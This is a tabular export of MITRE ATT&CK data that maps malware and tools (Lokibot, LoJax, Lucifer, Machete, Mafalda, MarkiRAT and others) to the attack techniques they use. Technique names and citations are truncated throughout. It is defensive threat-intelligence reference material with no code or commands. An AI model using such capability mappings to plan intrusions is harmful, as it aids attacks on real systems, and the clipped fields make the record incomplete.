S0513 LiteDuke malware-- software uses T1518.001Security S attack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1027.002Software Pattack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1027.003Steganogr attack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1082 System Inf attack-pat technique [LiteDuke]
S0513 LiteDuke malware-- software uses T1016 System Netattack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1033 System Own attack-pat technique [LiteDuke]
S0513 LiteDuke malware-- software uses T1497.003Time Basedattack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1071.001Web Protocattack-pat technique [LiteDuke]
S0680 LitePower malware--9software uses T1041 Exfiltratio attack-pat technique [LitePower]
S0680 LitePower malware--9software uses T1105 Ingress Tooattack-pat technique [LitePower
S0680 LitePower malware--9software uses T1106 Native API attack-pat technique [LitePower]
S0680 LitePower malware--9software uses T1059.001PowerShellattack-pat technique [LitePower
S0680 LitePower malware--9software uses T1012 Query Regiattack-pat technique [LitePower
S0680 LitePower malware--9software uses T1053.005Scheduled attack-pat technique [LitePower
S0680 LitePower malware--9software uses T1113 Screen Capattack-pat technique [LitePower
S0680 LitePower malware--9software uses T1518.001Security S attack-pat technique [LitePower]
S0680 LitePower malware--9software uses T1082 System Inf attack-pat technique [LitePower]
S0680 LitePower malware--9software uses T1033 System Own attack-pat technique [LitePower]
S0680 LitePower malware--9software uses T1071.001Web Protocattack-pat technique [LitePower
S0681 Lizar malware-- software uses T1560 Archive Coattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1217 Browser Inattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1555.003Credential attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1140 Deobfuscatattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1055.001Dynamic-linattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1087.003Email Accoattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1573 Encrypted attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1105 Ingress Tooattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1003.001LSASS Memattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1106 Native API attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1055.002Portable Exattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1059.001PowerShellattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1057 Process Di attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1055 Process Injattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1113 Screen Capattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1518.001Security S attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1082 System Inf attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1016 System Netattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1049 System Netattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1033 System Own attack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1059.003Windows Cattack-pat technique [Lizar](htt
S0681 Lizar malware-- software uses T1555.004Windows Cattack-pat technique [Lizar](htt
S1101 LoFiSe malware--4software uses T1560 Archive Coattack-pat technique [LoFiSe](ht
S1101 LoFiSe malware--4software uses T1119 Automatedattack-pat technique [LoFiSe](ht
S1101 LoFiSe malware--4software uses T1574.002DLL Side-L attack-pat technique [LoFiSe](ht
S1101 LoFiSe malware--4software uses T1005 Data from attack-pat technique [LoFiSe](ht
S1101 LoFiSe malware--4software uses T1083 File and Di attack-pat technique [LoFiSe](ht
[LoFiSe](https://attack.mitre.
S1101 LoFiSe malware--4software uses T1074.001Local Data attack-pat technique (Citation: Kaspersky ToddyCa
S0397 LoJax malware-- software uses T1112 Modify Regattack-pat technique [LoJax](ht
S0397 LoJax malware-- software uses T1564.004NTFS File Aattack-pat technique [LoJax](htt
S0397 LoJax malware-- software uses T1547.001Registry Ruattack-pat technique [LoJax](ht
S0397 LoJax malware-- software uses T1014 Rootkit attack-pat technique [LoJax](htt
S0397 LoJax malware-- software uses T1542.001System Fi attack-pat technique [LoJax](htt
S0372 LockerGogmalware-- software uses T1531 Account Acattack-pat technique [LockerGog
S0372 LockerGogmalware-- software uses T1553.002Code Signi attack-pat technique [LockerGoga
S0372 LockerGogmalware-- software uses T1486 Data Encryattack-pat technique [LockerGog
S0372 LockerGogmalware-- software uses T1562.001Disable or attack-pat technique [LockerGoga
S0372 LockerGogmalware-- software uses T1070.004File Deleti attack-pat technique [LockerGoga
S0372 LockerGogmalware-- software uses T1570 Lateral Tooattack-pat technique [LockerGog
S0372 LockerGogmalware-- software uses T1529 System Sh attack-pat technique [LockerGog
S0447 Lokibot malware--csoftware uses T1548.002Bypass Useattack-pat technique [Lokibot](https://attack.mitre
S0447 Lokibot malware--csoftware uses T1555 Credential attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1555.003Credential attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1140 Deobfuscatattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1041 Exfiltratio attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1070.004File Deleti attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1083 File and Di attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1564.001Hidden Fileattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1105 Ingress Tooattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1056.001Keyloggingattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1204.002Malicious Fattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1112 Modify Regattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1106 Native API attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1027 Obfuscatedattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1059.001PowerShellattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1055.012Process Hoattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1620 Reflective attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1053.005Scheduled attack-pat technique [Lokibot](
S0447 Lokibot malware--csoftware uses T1053 Scheduled attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1027.002Software Pattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1566.001Spearphishattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1082 System Inf attack-pat technique [Lokibot](
S0447 Lokibot malware--csoftware uses T1016 System Netattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1033 System Own attack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1497.003Time Basedattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1059.005Visual Basiattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1071.001Web Protocattack-pat technique [Lokibot](h
S0447 Lokibot malware--csoftware uses T1059.003Windows Cattack-pat technique [Lokibot](
S0582 LookBack malware-- software uses T1574.002DLL Side-L attack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1140 Deobfuscatattack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1070.004File Deleti attack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1083 File and Di attack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1036.005Match Legiattack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1095 Non-Applicattack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1057 Process Di attack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1547.001Registry Ruattack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1113 Screen Capattack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1489 Service Stoattack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1573.001Symmetric attack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1007 System Serattack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1529 System Sh attack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1059.005Visual Basiattack-pat technique [LookBack]
S0582 LookBack malware-- software uses T1071.001Web Protocattack-pat technique [LookBack](
S0582 LookBack malware-- software uses T1059.003Windows Cattack-pat technique [LookBack]
S0451 LoudMinermalware--fsoftware uses T1027.010Command aOttack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1496.001Compute Hiattack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1189 Drive-by C attack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1027.013Encrypted/attack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1070.004File Deleti attack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1564.001Hidden Fileattack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1105 Ingress Tooattack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1543.004Launch Da attack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1569.001Launchctl attack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1218.007Msiexec attack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1057 Process Di attack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1564.006Run Virtualattack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1569.002Service Ex attack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1082 System Inf attack-pat technique [LoudMiner
S0451 LoudMinermalware--fsoftware uses T1016 System Netattack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1059.004Unix Shell attack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1059.003Windows Cattack-pat technique [LoudMiner]
S0451 LoudMinermalware--fsoftware uses T1543.003Windows Se attack-pat technique [LoudMiner]
S0121 Lslsass tool--2fab software uses T1003.001LSASS Memattack-pat technique [Lslsass](h
S0532 Lucifer malware-- software uses T1071 Applicationattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1070.001Clear Windattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1496.001Compute Hiattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1140 Deobfuscatattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1210 Exploitatioattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1105 Ingress Tooattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1570 Lateral Tooattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1498 Network Deattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1046 Network Seattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1110.001Password Gattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1057 Process Di attack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1012 Query Regiattack-pat technique [Lucifer](
S0532 Lucifer malware-- software uses T1547.001Registry Ruattack-pat technique [Lucifer](
S0532 Lucifer malware-- software uses T1021.002SMB/Windo attack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1053.005Scheduled attack-pat technique [Lucifer](
S0532 Lucifer malware-- software uses T1027.002Software Pattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1573.001Symmetric attack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1497.001System Cheattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1082 System Inf attack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1016 System Netattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1049 System Netattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1033 System Own attack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1059.003Windows Cattack-pat technique [Lucifer](h
S0532 Lucifer malware-- software uses T1047 Windows M attack-pat technique [Lucifer](h
S1143 LunarLoademalware-- software uses T1137.006Add-ins attack-pat technique [LunarLoade
S1143 LunarLoademalware-- software uses T1140 Deobfuscatattack-pat technique [LunarLoade
S1143 LunarLoademalware-- software uses T1480 Execution attack-pat technique [LunarLoade
S1143 LunarLoademalware-- software uses T1620 Reflective attack-pat technique [LunarLoade
S1143 LunarLoademalware-- software uses T1016 System Netattack-pat technique [LunarLoade
S1142 LunarMail malware-- software uses T1137.006Add-ins attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1070.008Clear Mail attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1543 Create or attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1140 Deobfuscatattack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1027.013Encrypted/attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1041 Exfiltratio attack-pat technique [LunarMail
S1142 LunarMail malware-- software uses T1070.004File Deleti attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1083 File and Di attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1074.001Local Data attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1114.001Local Emailattack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1071.003Mail Protocattack-pat technique [LunarMail
S1142 LunarMail malware-- software uses T1204.002Malicious Fattack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1095 Non-Applicattack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1113 Screen Capattack-pat technique [LunarMail
S1142 LunarMail malware-- software uses T1001.002Steganogr attack-pat technique [LunarMail]
S1142 LunarMail malware-- software uses T1082 System Inf attack-pat technique [LunarMail
S1142 LunarMail malware-- software uses T1059.005Visual Basiattack-pat technique [LunarMail]
S1141 LunarWeb malware-- software uses T1560.002Archive viaattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1560.001Archive viaattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1573.002Asymmetricattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1030 Data Transfattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1140 Deobfuscatattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1027.013Encrypted/attack-pat technique The [LunarW
S1141 LunarWeb malware-- software uses T1070.004File Deleti attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1083 File and Di attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1615 Group Poliattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1559 Inter-Proc attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1069.001Local Grouattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1104 Multi-Stag attack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1135 Network Shattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1059.001PowerShellattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1057 Process Di attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1572 Protocol T attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1090 Proxy attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1518.001Security S attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1518 Software Dattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1132.001Standard Eattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1001.002Steganogr attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1573.001Symmetric attack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1082 System Inf attack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1016 System Netattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1049 System Netattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1033 System Own attack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1497.003Time Basedattack-pat technique [LunarWeb]
S1141 LunarWeb malware-- software uses T1071.001Web Protocattack-pat technique [LunarWeb](
S1141 LunarWeb malware-- software uses T1059.003Windows Cattack-pat technique [LunarWeb](https://attack.m
S1141 LunarWeb malware-- software uses T1047 Windows M attack-pat technique [LunarWeb](
S0010 Lurid malware--2software uses T1560 Archive Coattack-pat technique [Lurid](htt
S0010 Lurid malware--2software uses T1573.001Symmetric attack-pat technique [Lurid](htt
S0500 MCMD tool--9757 software uses T1070.009Clear Persiattack-pat technique [MCMD](http
S0500 MCMD tool--9757 software uses T1005 Data from attack-pat technique [MCMD](http
S0500 MCMD tool--9757 software uses T1564.003Hidden Wi attack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1105 Ingress Tooattack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1036.005Match Legiattack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1027 Obfuscatedattack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1547.001Registry Ruattack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1053.005Scheduled attack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1071.001Web Protocattack-pat technique [MCMD](htt
S0500 MCMD tool--9757 software uses T1059.003Windows Cattack-pat technique [MCMD](htt
S0443 MESSAGETmalware-- software uses T1560.003Archive vi attack-pat technique [MESSAGETA
S0443 MESSAGETmalware-- software uses T1119 Automatedattack-pat technique [MESSAGETAP
S0443 MESSAGETmalware-- software uses T1140 Deobfuscatattack-pat technique After chec
S0443 MESSAGETmalware-- software uses T1070.004File Deleti attack-pat technique Once loade
S0443 MESSAGETmalware-- software uses T1083 File and Di attack-pat technique [MESSAGETA
S0443 MESSAGETmalware-- software uses T1074.001Local Data attack-pat technique [MESSAGETA
S0443 MESSAGETmalware-- software uses T1040 Network Snattack-pat technique [MESSAGETAP
S0443 MESSAGETmalware-- software uses T1049 System Netattack-pat technique After load
S0233 MURKYTOPmalware-- software uses T1053.002At attack-pat technique [MURKYTOP]
S0233 MURKYTOPmalware-- software uses T1070.004File Deleti attack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1087.001Local Acco attack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1046 Network Seattack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1135 Network Shattack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1069 Permissionattack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1018 Remote Sysattack-pat technique [MURKYTOP]
S0233 MURKYTOPmalware-- software uses T1082 System Inf attack-pat technique [MURKYTOP](
S0233 MURKYTOPmalware-- software uses T1059.003Windows Cattack-pat technique [MURKYTOP]
S1016 MacMa malware-- software uses T1123 Audio Captattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1070.002Clear Linu attack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1553.002Code Signi attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1005 Data from attack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1140 Deobfuscatattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1573 Encrypted attack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1041 Exfiltratio attack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1070.004File Deleti attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1083 File and Di attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1553.001Gatekeeperattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1105 Ingress Tooattack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1555.001Keychain attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1056.001Keyloggingattack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1543.001Launch Ageattack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1074.001Local Data attack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1106 Native API attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1095 Non-Applicattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1571 Non-Standaattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1057 Process Di attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1021 Remote Serattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1113 Screen Capattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1082 System Inf attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1016 System Netattack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1033 System Own attack-pat technique [MacMa](ht
S1016 MacMa malware-- software uses T1070.006Timestompattack-pat technique [MacMa](htt
S1016 MacMa malware-- software uses T1059.004Unix Shell attack-pat technique [MacMa](ht
S0282 MacSpy malware-- software uses T1123 Audio Captattack-pat technique [MacSpy](h
S0282 MacSpy malware-- software uses T1115 Clipboard attack-pat technique [MacSpy](h
S0282 MacSpy malware-- software uses T1070.004File Deleti attack-pat technique [MacSpy](ht
S0282 MacSpy malware-- software uses T1564.001Hidden Fileattack-pat technique [MacSpy](ht
S0282 MacSpy malware-- software uses T1056.001Keyloggingattack-pat technique [MacSpy](h
S0282 MacSpy malware-- software uses T1543.001Launch Ageattack-pat technique [MacSpy](ht
S0282 MacSpy malware-- software uses T1090.003Multi-hop attack-pat technique [MacSpy](h
S0282 MacSpy malware-- software uses T1113 Screen Capattack-pat technique [MacSpy](h
S0282 MacSpy malware-- software uses T1071.001Web Protocattack-pat technique [MacSpy](h
S0409 Machete malware-- software uses T1010 Applicatio attack-pat technique [Machete](
S0409 Machete malware-- software uses T1560 Archive Coattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1560.003Archive vi attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1573.002Asymmetricattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1123 Audio Captattack-pat technique [Machete](
S0409 Machete malware-- software uses T1020 Automatedattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1217 Browser Inattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1115 Clipboard attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1027.010Command aOttack-pat technique [Machete](h
S0409 Machete malware-- software uses T1555.003Credential attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1005 Data from attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1025 Data from attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1140 Deobfuscatattack-pat technique [Machete](
S0409 Machete malware-- software uses T1041 Exfiltratio attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1052.001Exfiltratio attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1008 Fallback C attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1070.004File Deleti attack-pat technique Once a file
S0409 Machete malware-- software uses T1071.002File Transf attack-pat technique [Machete](
S0409 Machete malware-- software uses T1083 File and Di attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1564.001Hidden Fileattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1105 Ingress Tooattack-pat technique [Machete](
S0409 Machete malware-- software uses T1056.001Keyloggingattack-pat technique [Machete](
S0409 Machete malware-- software uses T1074.001Local Data attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1036.004Masquerade attack-pat technique [Machete](
S0409 Machete malware-- software uses T1036.005Match Legiattack-pat technique [Machete](
S0409 Machete malware-- software uses T1120 Peripheral attack-pat technique [Machete](
S0409 Machete malware-- software uses T1552.004Private Keyattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1057 Process Di attack-pat technique [Machete](
S0409 Machete malware-- software uses T1059.006Python attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1547.001Registry Ruattack-pat technique [Machete](h
S0409 Machete malware-- software uses T1053.005Scheduled attack-pat technique The differ
S0409 Machete malware-- software uses T1029 Scheduled attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1113 Screen Capattack-pat technique [Machete](
S0409 Machete malware-- software uses T1027.002Software Pattack-pat technique [Machete](
S0409 Machete malware-- software uses T1132.001Standard Eattack-pat technique [Machete](
S0409 Machete malware-- software uses T1573.001Symmetric attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1082 System Inf attack-pat technique [Machete](h
S0409 Machete malware-- software uses T1016 System Netattack-pat technique [Machete](
S0409 Machete malware-- software uses T1049 System Netattack-pat technique [Machete](
S0409 Machete malware-- software uses T1125 Video Captattack-pat technique [Machete](
S0409 Machete malware-- software uses T1071.001Web Protocattack-pat technique [Machete](
S1060 Mafalda malware-- software uses T1134 Access Tokattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1217 Browser Inattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1070.001Clear Windattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1005 Data from attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1622 Debugger Eattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1140 Deobfuscatattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1027.013Encrypted/attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1041 Exfiltratio attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1133 External R attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1083 File and Di attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1105 Ingress Tooattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1056 Input Capt attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1090.001Internal Prattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1003.001LSASS Memattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1074.001Local Data attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1134.003Make and attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1112 Modify Regattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1106 Native API attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1095 Non-Applicattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1205.001Port Knockattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1059.001PowerShellattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1552.004Private Keyattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1057 Process Di attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1012 Query Regiattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1113 Screen Capattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1518.001Security S attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1569.002Service Ex attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1132.001Standard Eattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1573.001Symmetric attack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1082 System Inf attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1016 System Netattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1049 System Netattack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1033 System Own attack-pat technique [Mafalda](
S1060 Mafalda malware-- software uses T1071.001Web Protocattack-pat technique [Mafalda](h
S1060 Mafalda malware-- software uses T1059.003Windows Cattack-pat technique [Mafalda](
S0413 MailSnipertool--999c software uses T1087.003Email Accoattack-pat technique [MailSnipe
S0413 MailSnipertool--999c software uses T1110.003Password Sattack-pat technique [MailSniper
S0413 MailSnipertool--999c software uses T1114.002Remote Ema attack-pat technique [MailSniper
S1156 Manjusakamalware--dsoftware uses T1555 Credential attack-pat technique [Manjusaka]
S1156 Manjusakamalware--dsoftware uses T1555.003Credential attack-pat technique [Manjusaka
S1156 Manjusakamalware--dsoftware uses T1041 Exfiltratio attack-pat technique [Manjusaka]
S1156 Manjusakamalware--dsoftware uses T1083 File and Di attack-pat technique [Manjusaka]
S1156 Manjusakamalware--dsoftware uses T1113 Screen Capattack-pat technique [Manjusaka]
S1156 Manjusakamalware--dsoftware uses T1132.001Standard Eattack-pat technique [Manjusaka
S1156 Manjusakamalware--dsoftware uses T1082 System Inf attack-pat technique [Manjusaka]
S1156 Manjusakamalware--dsoftware uses T1016 System Netattack-pat technique [Manjusaka
S1156 Manjusakamalware--dsoftware uses T1071.001Web Protocattack-pat technique [Manjusaka
S1156 Manjusakamalware--dsoftware uses T1059.003Windows Cattack-pat technique [Manjusaka]
S0652 MarkiRAT malware-- software uses T1197 BITS Jobs attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1115 Clipboard attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1005 Data from attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1041 Exfiltratio attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1083 File and Di attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1105 Ingress Tooattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1056.001Keyloggingattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1074.001Local Data attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1036.005Match Legiattack-pat technique [MarkiRAT]
S0652 MarkiRAT malware-- software uses T1106 Native API attack-pat technique [MarkiRAT]
S0652 MarkiRAT malware-- software uses T1555.005Password attack-pat technique [MarkiRAT]
